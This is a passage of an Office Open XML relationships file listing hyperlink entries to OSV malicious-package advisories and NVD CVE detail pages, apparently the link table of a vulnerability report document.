TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17339" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17340" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17341" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17342" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17343" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17344" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17345" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17346" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17347" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17348" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17349" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17350" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17351" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17352" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17353" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17354" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17355" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17356" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17357" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17358" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17359" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17360" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17361" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17362" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17363" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17364" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17365" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17366" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17367" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17368" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17369" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17370" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17371" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17372" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17373" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17374" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17375" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17376" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17377" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17378" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17379" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17380" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17381" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17382" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17383" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17384" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17385" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17386" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17387" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17388" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17389" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17390" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17391" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17392" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17393" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17394" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17395" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17396" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17397" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17398" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17399" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17400" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17401" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17402" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17403" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17404" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17405" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17406" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17407" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17408" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17409" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17410" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17411" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17412" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17413" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17414" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17415" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17416" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17417" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94952" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100758" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103056" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54400" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103040" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103041" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79536" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79537" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97689" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67993" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71971" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74220" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74221" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94953" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94954" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95362" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100700" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102253" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103043" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61519" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102911" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102794" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102875" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79403" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100702" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100756" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95301" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95344" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95376" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102930" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97687" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100241" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100244" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102276" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102278" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102281" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102728" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102758" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54873" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102266" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102267" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102271" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102272" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102273" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100288" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103054" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74225" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100699" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97688" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102310" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102320" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102330" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95297" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95330" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95366" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101911" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101912" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102635" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79535" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81872" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95375" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100238" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100243" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100245" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102329" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103045" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103046" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103047" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103049" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103050" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103051" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71972" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102274" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79534" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102938" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102845" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102874" TargetMode="External" Id="rId820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102908" TargetMode="External" Id="rId821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102909" TargetMode="External" Id="rId822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-31027" TargetMode="External" Id="rId823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100822" TargetMode="External" Id="rId824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100823" TargetMode="External" Id="rId825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93332" TargetMode="External" Id="rId826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95287" TargetMode="External" Id="rId827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95290" TargetMode="External" Id="rId828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95352" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95370" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101917" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102265" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102277" 